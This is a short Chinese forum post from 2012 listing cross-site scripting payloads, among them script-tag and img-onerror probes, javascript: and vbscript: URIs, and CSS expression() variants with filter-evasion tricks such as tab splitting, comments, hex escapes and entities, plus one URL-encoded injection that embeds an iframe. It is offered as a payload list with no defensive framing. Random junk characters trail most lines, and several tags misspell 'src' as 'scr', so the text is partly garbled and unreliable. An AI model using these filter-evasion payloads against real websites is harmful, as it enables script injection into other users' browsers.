<script>alert("跨站")</script> (最常用)9 J! V( Z) E$ B: }% L. i
<img scr=javascript:alert("跨站")></img>/ V6 I! O: o1 D( [. V- Z. W
<img scr="javascript: alert(/跨站/)></img>
$ f- Y# C9 v( g1 R) c, @<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)2 n3 |& K+ i$ x' A7 x% g
<img scr="#" onerror=alert(/跨站/)></img>' A/ K& e: i3 y; W
<img scr="#" style="xss:expression(alert(/xss/));"></img>
0 V+ ? P/ b* M( T+ ]<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
: g8 U& P4 \. c8 M' |( O, g<img src=vbscript:msgbox ("xss")></img>% g) W# N) N, x/ f. H5 z1 M, s" O
<style> input {left:expression (alert('xss'))}</style>
6 ?; j/ v# m: p) v<div style={left:expression (alert('xss'))}></div>
) c V; G3 I5 H% r2 p# h7 s<div style={left:exp/* */ression (alert('xss'))}></div>5 q* g M8 u% i2 d3 P0 }. J/ v
<div style={left:\0065\0078ression (alert('xss'))}></div>. l$ U3 T( _/ ^* `
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>6 y' a& `' | F) ^$ m' u$ p: Z% |' |
unicode <div style="{left:expRessioN (alert('xss'))}">
# E4 z7 H" y% Y, \' p4 }. t/ g% W1 T$ ?
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["' g) \& ]6 \2 ^$ {* I
|
发表于 2012-9-13 17:15:04
收藏
支持
反对